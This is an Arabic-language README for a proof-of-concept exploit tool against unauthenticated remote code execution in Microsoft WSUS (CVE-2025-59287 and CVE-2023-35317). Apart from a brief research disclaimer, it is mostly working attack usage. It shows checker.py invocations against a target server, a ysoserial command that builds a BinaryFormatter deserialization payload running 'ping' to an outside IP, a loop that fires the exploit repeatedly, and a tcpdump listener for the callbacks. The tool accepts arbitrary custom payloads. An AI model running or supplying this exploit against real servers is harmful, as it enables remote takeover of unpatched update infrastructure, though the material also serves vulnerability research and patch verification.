
إثبات مفهوم (PoC) لثغرة RCE غير مصادق عليها في Microsoft Windows Server Update Service (WSUS) - CVE-2025-59287 & CVE-2023-35317
داخل CVE-2025-59287: SoapFormatter RCE في WSUS: https://shellcode.blog/wsus-cve-2025-59287-investigation/
أُنشئ هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، ولا يُقصد استخدامه لمهاجمة الأنظمة إلا في الحالات المصرَّح بها صراحةً. لا يتحمل القائمون على المشروع أي مسؤولية أو تبعة تجاه سوء استخدام البرنامج. استخدمه بمسؤولية.
الخيارات المطلوبة:
--target-url – عنوان URL الأساسي لخادم WSUS المستهدف، مثال: http://WIN-246JC0TE3BB.vuln.local:8530--cve – أحد القيمتين CVE-2023-35317 أو CVE-2025-59287الخيارات الاختيارية:
--dns-name – اسم DNS للعميل المستخدم في طلبات SOAP (الافتراضي: bugcrowd.local)--random – أضف بادئة نطاق فرعي عشوائي إلى --dns-name بحيث يظهر كل تشغيل كعميل جديد--payload – حمولة ysoserial مخصصة مرمّزة بـ base64؛ إذا حُذفت، تُستخدم الحمولة المدمجة لقيمة --cve المختارة--debug – تفعيل تسجيل تصحيح مفصّل (أسطر [DEBUG])python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --randompython3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (أو اعتمد على الحمولة المدمجة لقيمة --cve CVE-2023-35317)for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;donesudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done